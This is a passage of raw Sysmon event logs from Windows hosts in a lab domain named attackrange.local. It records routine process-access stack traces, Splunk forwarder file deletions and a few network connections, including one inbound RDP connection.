CRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001048606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AE70479BA19550928E1A0096709099,SHA256=06A1546893D8C94E274F9B61BB6D5EEFFA7309747A2D92E1F7E449AD248EB13E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:48.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=287ABA4AC730726A33943EAD3FE517E9,SHA256=6EC82281A9401820C5E0A0F89708BD15EF612CB688858EEBAD8A9614543BB29C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:40.681{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51016-false10.0.1.12-8000- 10341000x80000000000000001048631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.536{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 
10341000x80000000000000001048630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.536{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001048622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x8000000000000000807493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:48.196{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru16604-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
